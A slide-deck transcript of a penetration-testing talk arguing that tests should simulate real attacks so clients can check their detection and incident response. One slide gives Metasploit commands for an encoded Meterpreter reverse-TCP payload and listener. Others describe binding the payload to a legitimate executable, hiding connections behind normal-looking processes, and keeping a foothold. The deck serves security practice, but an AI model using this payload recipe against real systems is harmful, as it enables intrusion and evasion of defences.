The document discusses the importance of simulating real-world attacks to help clients understand their vulnerabilities and improve their incident response preparations. It emphasizes the need for comprehensive testing beyond just identifying vulnerabilities, including assessing clients' awareness of attacks and the consequences of exploitation. The author suggests utilizing practical attack simulations to effectively engage clients and demonstrate the challenges they would face during a real attack.

1. Simulating Real
World Attacks
Thomas Mackenzie

2. Acknowledgements
Chris Nickerson
Carlos Perez
Simon Whitehouse

3. Introduction / Scope
Are clients aware of attacks happening to
them?
If they are not, how can we help them?
How can we test if they aware of an attack?

4. Remediation of an Attack
Remediation -
Step One -
Fixing the vulnerability that was exploited
Step Two -
Dealing with what happened post exploitation

5. Case Study
Lush.co.uk
They found out at the end of January about the
attack
Stated that the attack started “they think” on
the 4th October

6. Case Study cont.
Zurich UK
Lost 46,000 Customer Records
Found out 1 year later
Cost £2.28 million in fines - Not to mention fixing

7. Case Study cont.
Chain of events -
When did it start?
When did it end?
What information was available to the attacker?
What information was compromised?
Not counting -
How it happened.
How to stop it from happening again.

8. What am I saying?
Yes -
If they knew about the vulnerability in the first place
they could have stopped this from happening.
But they didn’t -
The attack happened and it has cost them money to
not just fix but to the chain of events stuff too.

9. Attacks we see
Layer 8 (Management)
Development Issues
0-Days
Passive Actions / Obfuscation Methods

10. Attacks we see cont.
These attacks are what we are seeing at the
moment.
When we do testing for clients we stop at the
vulnerability.
We stop at the exploit and we do not carry on.

11. Attacks we see cont.
Stopping at the vulnerability means -
The client get to do Step One of remediation
What about Step Two?

12. It is important!!!
Without the proper things in place it can take
a long time to fix this.
Self Detection
Law Enforcement
Public Detection
Regulatory Detection
0 50 100 150 200

13. Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
IDS / IPS / FW / Logs etc.
Attacks are still occurring and we are still
hearing about them all the time.

14. Why didn’t they know? cont.
Do we test this in our pen test?
How can we test if they are aware of an
attack?
Certainly not by just exploiting the
vulnerability we have to deep dive.

15. Is it Real?
Unless what you do is real your
client WILL NOT CARE!

25. Ask them!
Ask them what they care about
Why do they care?

26. The Brand

27. Employees

28. Customers

29. Money

30. Unless...
Unless the attack happens for real they don’t
have to deal with the aftermath!
Are they prepared?

31. IR
Not all companies have IR teams
How long does it take for the attackers trail to
be found?

32. Knowing you have been compromised = good
When and how long for = better

33. Reporting
When it comes to the report attack them with
simulated examples - examples you could
recreate.
Could you kill someone?
Can you steal money?
Can you change / recreate their product?

34. Report cont.
Give a time window / speak to only one person
Document everything you do
Ask them what they saw you do
Compare

35. Did they know?
Did they know you were attacking them
If so did they try to stop you?
If not why not!

37. Noise Levels
Low -
Ninja Hacking Skillz
Medium -
Make a few mistakes that should be detected
High -
Scan them to hell and back

38. Graded Levels
Level 1 - 5
Starting at Script Kiddies to Criminal

39. What are we doing!
Attacking systems with real results instead of
just giving information they don’t care about.

40. Methods
Low hanging fruit are the first checkpoints
Processes, connections, EventLog and in some case
memory dumps

41. Processes
Time of creation
Parent PID
Owner
Command Line

42. Hide!
Hide your connections
SVCHOST.exe looks normal if connecting to
high ports
Firefox, Dropbox, AV 80 and 443

43. Example
So what are we actually talking about?
How can we go about simulating an attack
like what we have just spoken about?

44. Ask and you shall receive
Brief
Discuss options for testing
What is important to them?

45. Seek and you will find
What was important to them?
Are they any exploits / 0-days for that piece of
software?

46. Knock and the door will be
opened
Simply and easily do not give up
There is always going to be some avenue of
attack for this client they may just not know
about it
Look at the following example

47. Attacking Layer 8
Idiots in the company are your first point of
call.
Is the CEO an idiot?
Skype is important to them - attack them with
what is important!

48. Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp
LHOST = x.x.x.x R | ./msfencode -e x86/
shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit

49. Attacking Layer 8 cont.
Using IExpress you can bind a primary .exe.
and your payload together
Settings available in IExpress
Running that evil .exe (BANG) reverse shell!

50. Do not leave it there!
What did I say at the beginning?
Once you have shell do something with it so
that it actually means something to them
Delete data / change data / get addresses /
create ways to stay there!

51. But WAIT!!! POLITICS!
You cannot just delete data without
permission!
Make sure you find out what you can do!

52. If you can delete...
You most likely can add

53. What is better?

54. What is better?

55. This?

56. What is better?

57. What is better?

58. This?

59. WHAT IS ALL THIS!
By simulating theses attacks the way I am
talking about the client can then see exactly
what they would need to do if it was a real
attack!

60. Future
@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.

61. Summary
Attack them, don’t pussy foot around!
Find out what they care about.
Make them realise how hard it would be to
fix.

62. :~$ whoami
Director of upSploit
Limited
Soon to be Web
Application Security
Consultant for
Trustwave
British Student
Podcaster

63. Questions
thomas@tmacuk.co.uk
www.tmacuk.co.uk / @tmacuk
www.upsploit.com / @upsploit